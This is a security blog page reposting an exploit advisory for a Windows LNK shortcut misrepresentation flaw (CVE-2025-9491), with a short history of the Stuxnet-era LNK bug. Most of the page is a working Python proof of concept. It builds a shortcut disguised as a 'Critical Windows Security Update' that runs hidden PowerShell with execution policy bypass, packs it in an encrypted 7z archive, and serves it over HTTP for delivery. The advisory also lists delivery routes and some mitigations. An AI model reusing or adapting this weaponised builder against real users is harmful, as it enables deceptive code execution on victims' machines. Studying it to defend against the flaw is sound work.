Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Microsoft Windows LNK File UI Misrepresentation Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 67
The Microsoft Windows LNK File UI Misrepresentation Remote Code Execution The Microsoft Windows LNK File UI Misrepresentation Remote Code Execution vulnerability (CVE-2010-2568) exploited how Windows handled shortcut files.

This critical flaw allowed a specially crafted LNK file to execute arbitrary code when its icon was merely viewed, even without double-clicking the shortcut.

The "UI Misrepresentation" aspect involved embedding a malicious DLL within or alongside the LNK file. The shortcut's icon and file type could then be spoofed, making it appear as a harmless folder or document.

When Windows Explorer or any application attempted to render the icon of this malicious LNK, it would inadvertently load and execute the embedded or referenced DLL.

This enabled remote code execution, typically via USB drives or network shares, as the payload triggered by simply browsing to a folder containing the malicious LNK.

It was famously exploited by the Stuxnet worm to spread and infect systems, highlighting its severe "wormable" nature. Microsoft released a critical patch to address this significant security flaw.

# Title: Windows LNK File UI Misrepresentation Remote Code Execution
# Date: 2025-01-04
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (Windows OS component)
# Version: Windows 10, Windows 11, Windows Server 2016/2019/2022
# Tested on: Windows 10 22H2, Windows 11 23H2
# CVE: CVE-2025-9491
# CVSS: 8.8

###Description:
A critical vulnerability exists in Microsoft Windows LNK file handling that
allows
attackers to create malicious shortcut files that appear legitimate in
Windows
Explorer while executing arbitrary commands. The vulnerability is a UI
misrepresentation flaw where Windows incorrectly displays file properties.

### Exploit:
[href](
https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py
)

### Technical Details:
The vulnerability allows attackers to craft LNK files with:
1. Legitimate-looking icons (document, PDF, Windows Update shield)
2. Misleading descriptions ("Security Update", "Important Document")
3. Hidden command execution in arguments field
4. Window state set to hidden (SW_SHOWMINNOACTIVE = 7)

When a user opens the malicious LNK file, Windows Explorer shows it as a
harmless
document, but the file actually executes commands with the user's
privileges.
No security warnings are displayed to the user.

### Proof of Concept:
An LNK file can be created that:
- Shows as "Windows Security Update" with shield icon
- Actually executes: cmd.exe /c powershell -Command "malicious_payload"
- Runs with hidden window (WindowStyle = 7)

### The LNK file can be delivered via:
1. Email attachments
2. Network shares
3. Web downloads
4. USB devices
5. Compressed archives

### Impact:
- Remote Code Execution with user privileges
- No user warnings or security prompts
- Complete UI deception
- Easy to weaponize

### Mitigation:
1. Enable display of file extensions in Windows Explorer
2. Block .LNK file attachments at email gateways
3. Implement application control (AppLocker, WDAC)
4. Monitor for hidden process execution
5. User education about suspicious files

### Vendor Status:
Microsoft has been notified. No patch available as of 2025-01-04.

References:
- CVE-2025-9491
- Microsoft Security Response Center

Note: This information is for defensive purposes only.
Unauthorized testing against systems you don't own is illegal.

--

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--- proof of concept ---

#!/usr/bin/python
# nu11secur1ty 2025
import os
import sys
import subprocess
import socket
import threading
import pythoncom
from win32com.client import Dispatch
from http.server import HTTPServer, BaseHTTPRequestHandler

def get_script_directory():
if getattr(sys, 'frozen', False):
return os.path.dirname(sys.executable)
else:
return os.path.dirname(os.path.abspath(__file__))

def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except:
ip = '0.0.0.0'
finally:
s.close()
return ip

def create_malicious_lnk():
script_dir = get_script_directory()
lnk_path = os.path.join(script_dir, 'Critical_Update.lnk')

print("[*] Creating malicious LNK file...")

try:
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(lnk_path)

shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'

shortcut.WorkingDirectory = r'C:\Windows\System32'
shortcut.Description = 'Critical Windows Security Update - KB5029244'

icon_paths = [
r'C:\Windows\System32\shell32.dll',
r'C:\Windows\System32\imageres.dll',
]

for icon_path in icon_paths:
if os.path.exists(icon_path):
shortcut.IconLocation = f'{icon_path},78'
break

shortcut.WindowStyle = 7
shortcut.save()

if os.path.exists(lnk_path):
print(f"[+] LNK created: {lnk_path}")
return lnk_path
else:
return None

except Exception as e:
print(f"[-] Error: {e}")
return None

def compress_with_7zip(lnk_path, password=None):
if not lnk_path or not os.path.exists(lnk_path):
print("[-] LNK file not found")
return None

seven_zip_paths = [
r'C:\Program Files\7-Zip\7z.exe',
r'C:\Program Files (x86)\7-Zip\7z.exe',
'7z.exe',
'7z'
]

seven_zip = None
for path in seven_zip_paths:
try:
result = subprocess.run([path, '--help'], capture_output=True, text=True)
if result.returncode == 0:
seven_zip = path
break
except:
continue

if not seven_zip:
print("[-] 7-Zip not found")
return None

archive_name = os.path.join(get_script_directory(), 'update.7z')

cmd = [seven_zip, 'a', archive_name, lnk_path]

if password:
cmd.extend(['-p' + password])

cmd.extend(['-mx9', '-mhe=on', '-t7z'])

print("[*] Compressing with 7-Zip...")

try:
result = subprocess.run(cmd, capture_output=True, text=True)

if result.returncode == 0:
print(f"[+] Archive created: {archive_name}")
if password:
print(f"[+] Password: {password}")
return archive_name
else:
return None

except Exception as e:
print(f"[-] Compression failed: {e}")
return None

class FileHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/update.7z':
file_path = 'update.7z'

if os.path.exists(file_path):
self.send_response(200)
self.send_header('Content-type', 'application/x-7z-compressed')
self.send_header('Content-Disposition', 'attachment; filename="update.7z"')

with open(file_path, 'rb') as f:
content = f.read()

self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}")
else:
self.send_error(404)
else:
self.send_error(404)

def log_message(self, format, *args):
pass

def start_server(port=8080):
ip = get_local_ip()

print(f"[+] Starting server on http://{ip}:{port}")
print(f"[+] Download URL: http://{ip}:{port}/update.7z")
print("[+] Server running...")

server = HTTPServer((ip, port), FileHandler)
server.serve_forever()

def main():
print("=" * 60)
print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server")
print("=" * 60)

try:
from win32com.client import Dispatch
except ImportError:
print("[-] Install pywin32: pip install pywin32")
return

# Create LNK
lnk_file = create_malicious_lnk()
if not lnk_file:
print("[-] Failed to create LNK")
return

# Compress with 7-Zip
print("\n[*] Compress with 7-Zip? (y/n): ", end='')
compress = input().lower().strip()

if compress == 'y':
print("[*] Password (optional): ", end='')
password = input().strip()
if not password:
password = None

archive = compress_with_7zip(lnk_file, password)

if archive:
print(f"\n[+] Archive ready: {archive}")

# Start HTTP server in background thread
server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()

ip = get_local_ip()
print(f"\n[+] Server started at http://{ip}:8080")
print(f"[+] Download: http://{ip}:8080/update.7z")
print("\n[+] PowerShell download command:")
print(f' iwr http://{ip}:8080/update.7z -OutFile update.7z')

# Keep main thread alive
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Shutting down...")
else:
print("[-] Compression failed")
print(f"[*] Use raw LNK: {lnk_file}")
else:
print(f"\n[*] Raw LNK file: {lnk_file}")

if __name__ == "__main__":
import time
main()

Social Media Share